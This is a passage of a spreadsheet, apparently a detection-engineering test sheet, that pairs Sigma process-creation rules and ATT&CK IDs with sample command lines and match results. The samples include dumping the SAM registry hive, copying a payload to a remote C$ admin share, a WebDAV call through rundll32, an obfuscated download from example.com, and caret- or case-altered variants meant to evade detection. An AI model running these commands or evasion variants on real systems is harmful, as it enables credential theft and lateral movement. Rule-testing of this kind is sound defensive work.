        <v>1</v>
      </c>
      <c r="G154" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H154" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I154" s="6" t="inlineStr">
        <is>
          <t>Dumping of Sensitive Hives Via Reg.EXE (fd877b94-9bb5-4191-bb25-d79cbd93c167)</t>
        </is>
      </c>
      <c r="J154" s="6" t="n">
        <v>3</v>
      </c>
      <c r="K154" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="155" ht="15.75" customHeight="1" s="42">
      <c r="A155" s="6" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B155" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_keys</t>
        </is>
      </c>
      <c r="C155" s="6" t="inlineStr">
        <is>
          <t>Exports Registry Key To a File</t>
        </is>
      </c>
      <c r="D155" s="6" t="inlineStr">
        <is>
          <t>f0e53e89-8d22-46ea-9db5-9d4796ee2f8a</t>
        </is>
      </c>
      <c r="E155" s="6" t="inlineStr">
        <is>
          <t>regedit.exe /e C:\temp\export.reg HKEY_CURRENT_USER\Software</t>
        </is>
      </c>
      <c r="F155" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G155" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H155" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I155" s="6" t="inlineStr">
        <is>
          <t>Imports Registry Key From a File (73bba97f-a82d-42ce-b315-9182e76c57b1); Exports Registry Key To a File (f0e53e89-8d22-46ea-9db5-9d4796ee2f8a)</t>
        </is>
      </c>
      <c r="J155" s="6" t="n">
        <v>3</v>
      </c>
      <c r="K155" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="156" ht="15.75" customHeight="1" s="42">
      <c r="A156" s="6" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B156" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_keys</t>
        </is>
      </c>
      <c r="C156" s="6" t="inlineStr">
        <is>
          <t>Exports Registry Key To a File</t>
        </is>
      </c>
      <c r="D156" s="6" t="inlineStr">
        <is>
          <t>f0e53e89-8d22-46ea-9db5-9d4796ee2f8a</t>
        </is>
      </c>
      <c r="E156" s="6" t="inlineStr">
        <is>
          <t>regedit.exe /e C:\temp\export.reg HKEY_CURRENT_USER\\Software</t>
        </is>
      </c>
      <c r="F156" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G156" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H156" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I156" s="6" t="inlineStr">
        <is>
          <t>Imports Registry Key From a File (73bba97f-a82d-42ce-b315-9182e76c57b1); Exports Registry Key To a File (f0e53e89-8d22-46ea-9db5-9d4796ee2f8a)</t>
        </is>
      </c>
      <c r="J156" s="6" t="n">
        <v>3</v>
      </c>
      <c r="K156" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="157" ht="15.75" customHeight="1" s="42">
      <c r="A157" s="6" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B157" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_keys</t>
        </is>
      </c>
      <c r="C157" s="6" t="inlineStr">
        <is>
          <t>Exports Registry Key To a File</t>
        </is>
      </c>
      <c r="D157" s="6" t="inlineStr">
        <is>
          <t>f0e53e89-8d22-46ea-9db5-9d4796ee2f8a</t>
        </is>
      </c>
      <c r="E157" s="6" t="inlineStr">
        <is>
          <t>regedit.exe /e C:\temp\export.reg HKEY_CURRENT_USER/Software</t>
        </is>
      </c>
      <c r="F157" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G157" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H157" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I157" s="6" t="inlineStr">
        <is>
          <t>Imports Registry Key From a File (73bba97f-a82d-42ce-b315-9182e76c57b1); Exports Registry Key To a File (f0e53e89-8d22-46ea-9db5-9d4796ee2f8a)</t>
        </is>
      </c>
      <c r="J157" s="6" t="n">
        <v>3</v>
      </c>
      <c r="K157" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="158" ht="15.75" customHeight="1" s="42">
      <c r="A158" s="6" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B158" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_keys</t>
        </is>
      </c>
      <c r="C158" s="6" t="inlineStr">
        <is>
          <t>Exports Registry Key To a File</t>
        </is>
      </c>
      <c r="D158" s="6" t="inlineStr">
        <is>
          <t>f0e53e89-8d22-46ea-9db5-9d4796ee2f8a</t>
        </is>
      </c>
      <c r="E158" s="6" t="inlineStr">
        <is>
          <t>regedit.exe /e C:\temp\export.reg HKEY_CURRENT_USER\Software /y</t>
        </is>
      </c>
      <c r="F158" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G158" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H158" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I158" s="6" t="inlineStr">
        <is>
          <t>Imports Registry Key From a File (73bba97f-a82d-42ce-b315-9182e76c57b1); Exports Registry Key To a File (f0e53e89-8d22-46ea-9db5-9d4796ee2f8a)</t>
        </is>
      </c>
      <c r="J158" s="6" t="n">
        <v>3</v>
      </c>
      <c r="K158" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="159" ht="15.75" customHeight="1" s="42">
      <c r="A159" s="6" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B159" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_keys</t>
        </is>
      </c>
      <c r="C159" s="6" t="inlineStr">
        <is>
          <t>Exports Registry Key To a File</t>
        </is>
      </c>
      <c r="D159" s="6" t="inlineStr">
        <is>
          <t>f0e53e89-8d22-46ea-9db5-9d4796ee2f8a</t>
        </is>
      </c>
      <c r="E159" s="6" t="inlineStr">
        <is>
          <t>regedit.exe /e C:\temp\export.reg HKEY_CURRENT_USER\Software &gt; NUL</t>
        </is>
      </c>
      <c r="F159" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G159" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H159" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I159" s="6" t="inlineStr">
        <is>
          <t>Imports Registry Key From a File (73bba97f-a82d-42ce-b315-9182e76c57b1); Exports Registry Key To a File (f0e53e89-8d22-46ea-9db5-9d4796ee2f8a)</t>
        </is>
      </c>
      <c r="J159" s="6" t="n">
        <v>3</v>
      </c>
      <c r="K159" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="160" ht="15.75" customHeight="1" s="42">
      <c r="A160" s="6" t="inlineStr">
        <is>
          <t>t1048.003</t>
        </is>
      </c>
      <c r="B160" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_webdav_client_execution</t>
        </is>
      </c>
      <c r="C160" s="6" t="inlineStr">
        <is>
          <t>WebDav Client Execution Via Rundll32.EXE</t>
        </is>
      </c>
      <c r="D160" s="6" t="inlineStr">
        <is>
          <t>2dbd9d3d-9e27-42a8-b8df-f13825c6c3d5</t>
        </is>
      </c>
      <c r="E160" s="6" t="inlineStr">
        <is>
          <t>rundll32.exe "C:\\windows\\system32\\davclnt.dll",DavSetCookie</t>
        </is>
      </c>
      <c r="F160" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G160" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H160" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I160" s="6" t="inlineStr">
        <is>
          <t>Rundll32 Execution With Uncommon DLL Extension (c3a99af4-35a9-4668-879e-c09aeb4f2bdf)</t>
        </is>
      </c>
      <c r="J160" s="6" t="n">
        <v>3</v>
      </c>
      <c r="K160" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="161" ht="15.75" customHeight="1" s="42">
      <c r="A161" s="6" t="inlineStr">
        <is>
          <t>t1048.003</t>
        </is>
      </c>
      <c r="B161" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_webdav_client_susp_execution</t>
        </is>
      </c>
      <c r="C161" s="6" t="inlineStr">
        <is>
          <t>Suspicious WebDav Client Execution Via Rundll32.EXE</t>
        </is>
      </c>
      <c r="D161" s="6" t="inlineStr">
        <is>
          <t>982e9f2d-1a85-4d5b-aea4-31f5e97c6555</t>
        </is>
      </c>
      <c r="E161" s="6" t="inlineStr">
        <is>
          <t>rundll32.exe "C:\Windows\System32\davclnt.dll",DavSetCookie http://203.0.113.5/share</t>
        </is>
      </c>
      <c r="F161" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G161" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H161" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I161" s="6" t="inlineStr">
        <is>
          <t>Rundll32 Execution With Uncommon DLL Extension (c3a99af4-35a9-4668-879e-c09aeb4f2bdf)</t>
        </is>
      </c>
      <c r="J161" s="6" t="n">
        <v>3</v>
      </c>
      <c r="K161" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="162" ht="15.75" customHeight="1" s="42">
      <c r="A162" s="6" t="inlineStr">
        <is>
          <t>t1560</t>
        </is>
      </c>
      <c r="B162" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_tar_compression</t>
        </is>
      </c>
      <c r="C162" s="6" t="inlineStr">
        <is>
          <t>Compressed File Creation Via Tar.EXE</t>
        </is>
      </c>
      <c r="D162" s="6" t="inlineStr">
        <is>
          <t>418a3163-3247-4b7b-9933-dcfcb7c52ea9</t>
        </is>
      </c>
      <c r="E162" s="6" t="inlineStr">
        <is>
          <t>tar -cf backup.tar C:\Users\Public\Logs</t>
        </is>
      </c>
      <c r="F162" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G162" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H162" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I162" s="6" t="inlineStr">
        <is>
          <t>Compressed File Creation Via Tar.EXE (418a3163-3247-4b7b-9933-dcfcb7c52ea9)</t>
        </is>
      </c>
      <c r="J162" s="6" t="n">
        <v>3</v>
      </c>
      <c r="K162" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="163" ht="15.75" customHeight="1" s="42">
      <c r="A163" s="6" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B163" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_critical_keys</t>
        </is>
      </c>
      <c r="C163" s="6" t="inlineStr">
        <is>
          <t>Exports Critical Registry Keys To a File</t>
        </is>
      </c>
      <c r="D163" s="6" t="inlineStr">
        <is>
          <t>82880171-b475-4201-b811-e9c826cd5eaa</t>
        </is>
      </c>
      <c r="E163" s="6" t="inlineStr">
        <is>
          <t>reg.exe save HKLM\SAM C:\temp\sam.save</t>
        </is>
      </c>
      <c r="F163" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G163" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H163" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I163" s="6" t="inlineStr">
        <is>
          <t>Dumping of Sensitive Hives Via Reg.EXE (fd877b94-9bb5-4191-bb25-d79cbd93c167)</t>
        </is>
      </c>
      <c r="J163" s="6" t="n"/>
      <c r="K163" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="164" ht="15.75" customHeight="1" s="42">
      <c r="A164" s="6" t="inlineStr">
        <is>
          <t>t1563.002</t>
        </is>
      </c>
      <c r="B164" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C164" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D164" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E164" s="6" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "[System.IO.File]::Copy('C:\temp\payload.exe', '\\10.0.0.2\C$\payload.exe')"</t>
        </is>
      </c>
      <c r="F164" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G164" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H164" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I164" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J164" s="6" t="n"/>
      <c r="K164" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="165" ht="15.75" customHeight="1" s="42">
      <c r="A165" s="6" t="inlineStr">
        <is>
          <t>t1563.002</t>
        </is>
      </c>
      <c r="B165" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C165" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D165" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E165" s="6" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "(Get-Item 'C:\temp\file.txt').CopyTo('\\192.168.1.10\C$\Windows\Temp\file.txt')"</t>
        </is>
      </c>
      <c r="F165" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G165" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H165" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I165" s="6" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder (a6a39bdb-935c-4f0a-ab77-35f4bbf44d33); Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J165" s="6" t="n"/>
      <c r="K165" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="166" ht="15.75" customHeight="1" s="42">
      <c r="A166" s="6" t="inlineStr">
        <is>
          <t>t1563.002</t>
        </is>
      </c>
      <c r="B166" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C166" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D166" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E166" s="6" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "(Get-Item 'C:\temp\file.txt').CopyTo('\\192.168.1.10\C$\Windows\Temp\file.txt')"</t>
        </is>
      </c>
      <c r="F166" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G166" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H166" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I166" s="6" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder (a6a39bdb-935c-4f0a-ab77-35f4bbf44d33); Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J166" s="6" t="n"/>
      <c r="K166" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="167" ht="15.75" customHeight="1" s="42">
      <c r="A167" s="6" t="inlineStr">
        <is>
          <t>t1563.002</t>
        </is>
      </c>
      <c r="B167" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C167" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D167" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E167" s="6" t="inlineStr">
        <is>
          <t>powershell -nop /"Command" "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F167" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G167" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H167" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I167" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J167" s="6" t="n"/>
      <c r="K167" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="168" ht="15.75" customHeight="1" s="42">
      <c r="A168" s="6" t="inlineStr">
        <is>
          <t>t1563.002</t>
        </is>
      </c>
      <c r="B168" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C168" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D168" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E168" s="6" t="inlineStr">
        <is>
          <t>powershell -nOPrOFilE /"Command" "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F168" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G168" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H168" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I168" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J168" s="6" t="n"/>
      <c r="K168" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="169" ht="15.75" customHeight="1" s="42">
      <c r="A169" s="6" t="inlineStr">
        <is>
          <t>t1563.002</t>
        </is>
      </c>
      <c r="B169" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C169" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D169" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E169" s="6" t="inlineStr">
        <is>
          <t>powershell -"NoProfile" -COmmaNd "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F169" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G169" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H169" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I169" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J169" s="6" t="n"/>
      <c r="K169" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="170" ht="15.75" customHeight="1" s="42">
      <c r="A170" s="6" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B170" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C170" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D170" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E170" s="6" t="inlineStr">
        <is>
          <t>powershell -nopROfilE -"Command" "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F170" s="6" t="b">
        <v>0</v>
      </c>
      <c r="G170" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H170" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I170" s="34" t="n"/>
      <c r="J170" s="6" t="n"/>
      <c r="K170" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="171" ht="15.75" customHeight="1" s="42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</row>
    <row r="172" ht="15.75" customHeight="1" s="42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</row>
    <row r="173" ht="15.75" customHeight="1" s="42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</row>
    <row r="174" ht="15.75" customHeight="1" s="42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</row>
    <row r="175" ht="15.75" customHeight="1" s="42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</row>
    <row r="176" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="178" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="180" ht="15.75" customHeight="1" s="42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</row>
    <row r="181" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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15.75" customHeight="1" s="42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</row>
    <row r="187" ht="15.75" customHeight="1" s="42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</row>
    <row r="188" ht="15.75" customHeight="1" s="42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</row>
    <row r="189" ht="15.75" customHeight="1" s="42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</row>
    <row r="190" ht="15.75" customHeight="1" s="42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</row>
    <row r="191" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="193" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="195" ht="15.75" customHeight="1" s="42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</row>
    <row r="196" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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15.75" customHeight="1" s="42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</row>
    <row r="202" ht="15.75" customHeight="1" s="42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</row>
    <row r="203" ht="15.75" customHeight="1" s="42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</row>
    <row r="204" ht="15.75" customHeight="1" s="42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</row>
    <row r="205" ht="15.75" customHeight="1" s="42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</row>
    <row r="206" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="208" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="210" ht="15.75" customHeight="1" s="42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</row>
    <row r="211" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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15.75" customHeight="1" s="42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</row>
    <row r="217" ht="15.75" customHeight="1" s="42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</row>
    <row r="218" ht="15.75" customHeight="1" s="42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</row>
    <row r="219" ht="15.75" customHeight="1" s="42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</row>
    <row r="220" ht="15.75" customHeight="1" s="42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</row>
    <row r="221" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="223" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="225" ht="15.75" customHeight="1" s="42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</row>
    <row r="226" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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15.75" customHeight="1" s="42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</row>
    <row r="232" ht="15.75" customHeight="1" s="42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</row>
    <row r="233" ht="15.75" customHeight="1" s="42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</row>
    <row r="961" ht="15.75" customHeight="1" s="42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</row>
    <row r="962" ht="15.75" customHeight="1" s="42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</row>
    <row r="963" ht="15.75" customHeight="1" s="42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</row>
    <row r="964" ht="15.75" customHeight="1" s="42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</row>
    <row r="965" ht="15.75" customHeight="1" s="42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</row>
    <row r="966" ht="15.75" customHeight="1" s="42">
      <c r="A966" s="34" t="inlineStr">
        <is>
          <t>t1567.002</t>
        </is>
      </c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b">
        <v>0</v>
      </c>
    </row>
    <row r="967" ht="15.75" customHeight="1" s="42">
      <c r="A967" s="41" t="n"/>
      <c r="B967" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_email_exfil</t>
        </is>
      </c>
      <c r="C967" s="41" t="inlineStr">
        <is>
          <t>Email Exifiltration Via Powershell</t>
        </is>
      </c>
      <c r="D967" s="41" t="inlineStr">
        <is>
          <t>312d0384-401c-4b8b-abdf-685ffba9a332</t>
        </is>
      </c>
      <c r="E967" s="41" t="n"/>
      <c r="F967" s="41" t="n"/>
      <c r="G967" s="41" t="n"/>
      <c r="H967" s="41" t="n"/>
      <c r="I967" s="41" t="n"/>
      <c r="J967" s="41" t="n"/>
      <c r="K967" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="968" ht="15.75" customHeight="1" s="42">
      <c r="A968" s="41" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B968" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_bcp_export_data</t>
        </is>
      </c>
      <c r="C968" s="41" t="inlineStr">
        <is>
          <t>Data Export From MSSQL Table Via BCP.EXE</t>
        </is>
      </c>
      <c r="D968" s="41" t="inlineStr">
        <is>
          <t>c615d676-f655-46b9-b913-78729021e5d7</t>
        </is>
      </c>
      <c r="E968" s="41" t="inlineStr">
        <is>
          <t>C:\Tools\bcp.exe TestDB.dbo.TestTable "out" C:\Temp\test.txt -c -T</t>
        </is>
      </c>
      <c r="F968" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G968" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H968" s="41" t="b">
        <v>1</v>
      </c>
      <c r="I968" s="41" t="n"/>
      <c r="J968" s="41" t="n"/>
      <c r="K968" s="41" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="969" ht="15.75" customHeight="1" s="42">
      <c r="A969" s="41" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B969" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_bcp_export_data</t>
        </is>
      </c>
      <c r="C969" s="41" t="inlineStr">
        <is>
          <t>Data Export From MSSQL Table Via BCP.EXE</t>
        </is>
      </c>
      <c r="D969" s="41" t="inlineStr">
        <is>
          <t>c615d676-f655-46b9-b913-78729021e5d7</t>
        </is>
      </c>
      <c r="E969" s="41" t="inlineStr">
        <is>
          <t>C:\Tools\bcp.exe TestDB.dbo.TestTable	out	C:\Temp\test.txt -c -T</t>
        </is>
      </c>
      <c r="F969" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G969" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H969" s="41" t="b">
        <v>1</v>
      </c>
      <c r="I969" s="41" t="n"/>
      <c r="J969" s="41" t="n"/>
      <c r="K969" s="41" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="970" ht="15.75" customHeight="1" s="42">
      <c r="A970" s="41" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B970" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_bcp_export_data</t>
        </is>
      </c>
      <c r="C970" s="41" t="inlineStr">
        <is>
          <t>Data Export From MSSQL Table Via BCP.EXE</t>
        </is>
      </c>
      <c r="D970" s="41" t="inlineStr">
        <is>
          <t>c615d676-f655-46b9-b913-78729021e5d7</t>
        </is>
      </c>
      <c r="E970" s="41" t="inlineStr">
        <is>
          <t>C:\Tools\bcp.exe TestDB.dbo.TestTable out	C:\Temp\test.txt -c -T</t>
        </is>
      </c>
      <c r="F970" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G970" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H970" s="41" t="b">
        <v>1</v>
      </c>
      <c r="I970" s="41" t="n"/>
      <c r="J970" s="41" t="n"/>
      <c r="K970" s="41" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="971" ht="15.75" customHeight="1" s="42">
      <c r="A971" s="41" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B971" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_bcp_export_data</t>
        </is>
      </c>
      <c r="C971" s="41" t="inlineStr">
        <is>
          <t>Data Export From MSSQL Table Via BCP.EXE</t>
        </is>
      </c>
      <c r="D971" s="41" t="inlineStr">
        <is>
          <t>c615d676-f655-46b9-b913-78729021e5d7</t>
        </is>
      </c>
      <c r="E971" s="41" t="inlineStr">
        <is>
          <t>cmd.exe /c C:\Tools\bcp.exe TestDB.dbo.TestTable o^ut C:\Temp\test.txt -c -T</t>
        </is>
      </c>
      <c r="F971" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G971" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H971" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I971" s="41" t="inlineStr">
        <is>
          <t>Data Export From MSSQL Table Via BCP.EXE (c615d676-f655-46b9-b913-78729021e5d7)</t>
        </is>
      </c>
      <c r="J971" s="41" t="n"/>
      <c r="K971" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="972" ht="15.75" customHeight="1" s="42">
      <c r="A972" s="41" t="inlineStr">
        <is>
          <t>t1567</t>
        </is>
      </c>
      <c r="B972" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_configsecuritypolicy_download_file</t>
        </is>
      </c>
      <c r="C972" s="41" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via ConfigSecurityPolicy.EXE</t>
        </is>
      </c>
      <c r="D972" s="41" t="inlineStr">
        <is>
          <t>1f0f6176-6482-4027-b151-00071af39d7e</t>
        </is>
      </c>
      <c r="E972" s="41" t="inlineStr">
        <is>
          <t>cmd.exe /c ConfigSecurityPolicy.exe C:\Temp\settings.xml htt^ps://example.com/payload</t>
        </is>
      </c>
      <c r="F972" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G972" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H972" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I972" s="41" t="n"/>
      <c r="J972" s="41" t="n"/>
      <c r="K972" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="973" ht="15.75" customHeight="1" s="42">
